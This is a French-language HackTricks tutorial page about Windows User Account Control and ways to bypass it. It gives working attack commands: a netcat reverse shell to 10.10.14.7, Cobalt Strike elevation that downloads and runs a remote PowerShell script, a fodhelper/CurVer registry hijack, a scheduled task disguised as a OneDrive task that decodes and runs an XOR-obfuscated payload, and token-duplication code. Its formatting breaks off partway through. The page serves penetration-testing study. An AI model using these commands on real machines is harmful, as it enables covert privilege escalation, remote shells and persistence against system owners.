UAC - User Account Control

Tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

• Vérifiez les plans d’abonnement !
• Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
• Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.

UAC

User Account Control (UAC) est une fonctionnalité qui permet une invite de consentement pour les actions nécessitant une élévation. Les applications ont différents niveaux d’integrity, et un programme avec un niveau élevé peut effectuer des tâches qui pourraient potentiellement compromettre le système. Lorsque UAC est activé, les applications et les tâches s’exécutent toujours dans le contexte de sécurité d’un compte non-administrateur sauf si un administrateur autorise explicitement ces applications/tâches à disposer d’un accès de niveau administrateur pour s’exécuter. C’est une fonctionnalité de confort qui protège les administrateurs contre des modifications involontaires, mais ce n’est pas considérée comme une frontière de sécurité.

Pour plus d’infos sur les niveaux d’integrity :

Integrity Levels

Lorsqu’UAC est en place, un utilisateur administrateur se voit attribuer deux jetons : un jeton d’utilisateur standard, pour effectuer les actions régulières au niveau standard, et un jeton avec les privilèges administrateur.

Cette page explique en profondeur le fonctionnement de UAC et couvre le processus de connexion, l’expérience utilisateur et l’architecture de UAC. Les administrateurs peuvent utiliser des stratégies de sécurité pour configurer le comportement de l’UAC spécifique à leur organisation au niveau local (en utilisant secpol.msc), ou les configurer et les déployer via des Group Policy Objects (GPO) dans un environnement de domaine Active Directory. Les différents paramètres sont décrits en détail ici. Il y a 10 paramètres de stratégie de groupe qui peuvent être définis pour UAC. Le tableau suivant fournit des détails supplémentaires :

Politiques d’installation de logiciels sur Windows

Les stratégies de sécurité locales (“secpol.msc” sur la plupart des systèmes) sont configurées par défaut pour empêcher les utilisateurs non-admin d’installer des logiciels. Cela signifie que même si un utilisateur non-admin peut télécharger l’installateur de votre logiciel, il ne pourra pas l’exécuter sans un compte administrateur.

Clés de registre pour forcer UAC à demander une élévation

En tant qu’utilisateur standard sans droits admin, vous pouvez faire en sorte que le compte “standard” soit invité à fournir des identifiants par UAC lorsqu’il tente d’effectuer certaines actions. Cette action nécessite la modification de certaines clés de registre, pour lesquelles il faut des permissions administratives, à moins qu’il n’existe un UAC bypass, ou que l’attaquant soit déjà connecté en tant qu’admin.

Même si l’utilisateur fait partie du groupe Administrators, ces modifications obligent l’utilisateur à ressaisir les identifiants de son compte pour effectuer des actions administratives.

Le seul inconvénient est que cette approche nécessite que l’UAC soit désactivé pour fonctionner, ce qui est peu probable dans des environnements de production.

Les clés et entrées de registre que vous devez modifier sont les suivantes (avec leurs valeurs par défaut entre parenthèses) :

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System:
• ConsentPromptBehaviorUser = 1 (3)
• ConsentPromptBehaviorAdmin = 1 (5)
• PromptOnSecureDesktop = 1 (1)

Cela peut également être fait manuellement via l’outil Local Security Policy. Une fois modifié, les opérations administratives invitent l’utilisateur à ressaisir ses identifiants.

Remarque

User Account Control n’est pas une frontière de sécurité. Par conséquent, les utilisateurs standard ne peuvent pas s’échapper de leur compte et obtenir des droits d’administrateur sans un local privilege escalation exploit.

Ask for ‘full computer access’ to a user

hostname | Set-Clipboard
Enable-PSRemoting -SkipNetworkProfileCheck -Force

cd C:\Users\hacedorderanas\Desktop
New-PSSession -Name "Case ID: 1527846" -ComputerName hostname
Enter-PSSession -ComputerName hostname

Privilèges UAC

• Internet Explorer Protected Mode utilise des vérifications d’intégrité pour empêcher les processus de haut niveau d’intégrité (comme les navigateurs web) d’accéder aux données de bas niveau d’intégrité (comme le dossier des fichiers Internet temporaires). Cela se fait en exécutant le navigateur avec un low-integrity token. Lorsque le navigateur tente d’accéder à des données stockées dans la low-integrity zone, le système d’exploitation vérifie le niveau d’intégrité du processus et autorise l’accès en conséquence. Cette fonctionnalité aide à empêcher que des attaques d’exécution de code à distance n’accèdent à des données sensibles sur le système.
• Lorsqu’un utilisateur se connecte à Windows, le système crée un access token qui contient une liste des privilèges de l’utilisateur. Les privilèges sont définis comme la combinaison des droits et capacités d’un utilisateur. Le token contient également une liste des identifiants de l’utilisateur, qui sont utilisés pour authentifier l’utilisateur sur l’ordinateur et auprès des ressources du réseau.

Autoadminlogon

Pour configurer Windows afin de se connecter automatiquement avec un utilisateur spécifique au démarrage, définissez la clé de registre AutoAdminLogon. Ceci est utile pour des environnements kiosk ou pour des tests. N’utilisez ceci que sur des systèmes sécurisés, car cela expose le mot de passe dans le registre.

Définissez les clés suivantes à l’aide de l’Éditeur du Registre ou de reg add:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:
• AutoAdminLogon = 1
• DefaultUsername = username
• DefaultPassword = password

Pour revenir au comportement de connexion normal, réglez AutoAdminLogon sur 0.

UAC bypass

Tip

Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on “Yes” when the UAC prompt appears

Le UAC bypass est nécessaire dans la situation suivante : le UAC est activé, votre processus s’exécute dans un contexte d’intégrité moyenne, et votre utilisateur appartient au groupe Administrators.

Il est important de mentionner qu’il est beaucoup plus difficile de contourner le UAC si celui-ci est au niveau de sécurité le plus élevé (Always) que s’il est à l’un des autres niveaux (Default).

UAC disabled

Si le UAC est déjà désactivé (ConsentPromptBehaviorAdmin est 0) vous pouvez exécuter un reverse shell avec les privilèges administrateur (niveau d’intégrité élevé) en utilisant quelque chose comme :

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UAC bypass with token duplication

• https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
• https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html

Très basique UAC “bypass” (accès complet au système de fichiers)

Si vous avez un shell avec un utilisateur qui fait partie du groupe Administrators, vous pouvez monter le partage C$ via SMB en tant que nouveau lecteur local et vous aurez accès à tout le contenu du système de fichiers (même le dossier personnel d’Administrator).

Warning

Il semble que cette astuce ne fonctionne plus

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

UAC bypass with cobalt strike

Les techniques Cobalt Strike ne fonctionneront que si UAC n’est pas réglé au niveau de sécurité maximal.

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire et Metasploit disposent également de plusieurs modules pour bypass le UAC.

KRBUACBypass

Documentation et outil sur https://github.com/wh0amitz/KRBUACBypass

UAC bypass exploits

UACME qui est une compilation de plusieurs UAC bypass exploits. Notez que vous devrez compile UACME using visual studio or msbuild. La compilation créera plusieurs exécutables (comme Source\Akagi\outout\x64\Debug\Akagi.exe), vous devrez savoir lequel vous devez utiliser.
Vous devez être prudent car certains bypasses vont faire apparaître des dialogues d’autres programmes qui vont alerter l’utilisateur que quelque chose est en cours.

UACME fournit la version de build à partir de laquelle chaque technique a commencé à fonctionner. Vous pouvez rechercher une technique affectant vos versions:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

De plus, en utilisant this vous obtenez la version Windows 1607 à partir des numéros de build.

UAC Bypass – fodhelper.exe (Registry hijack)

Le binaire de confiance fodhelper.exe est automatiquement élevé sur les versions récentes de Windows. Lors de son lancement, il interroge le chemin de registre par utilisateur ci‑dessous sans valider le verbe DelegateExecute. Placer une commande à cet emplacement permet à un processus Medium Integrity (l’utilisateur appartient au groupe Administrators) de lancer un processus High Integrity sans déclencher la boîte de dialogue UAC.

Chemin de registre interrogé par fodhelper :

HKCU\Software\Classes\ms-settings\Shell\Open\command

</details>
Remarques :
- Fonctionne lorsque l'utilisateur courant est membre du groupe Administrators et que le niveau UAC est par défaut/permissif (pas Always Notify avec restrictions supplémentaires).
- Utilisez le chemin `sysnative` pour lancer un PowerShell 64 bits depuis un processus 32 bits sur un Windows 64 bits.
- Le payload peut être n'importe quelle commande (PowerShell, cmd, ou un chemin vers un EXE). Évitez les UIs avec des invites pour rester discret.

#### Variante CurVer/extension hijack (seulement HKCU)

Des échantillons récents abusant de `fodhelper.exe` évitent `DelegateExecute` et **redirigent le ProgID `ms-settings`** via la valeur `CurVer` par utilisateur. Le binaire auto-élevé résout toujours le gestionnaire sous `HKCU`, donc aucun token admin n'est nécessaire pour créer les clés :
```powershell
# Point ms-settings to a custom extension (.thm) and map that extension to our payload
New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force

Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe

schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"

$pid = Invoke-RAiProcessRunOnce
$p = Get-Process -Id $pid
$t = Get-NtToken -Process $p
$id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
$auth = Get-NtTokenId -Authentication -Token $id
New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"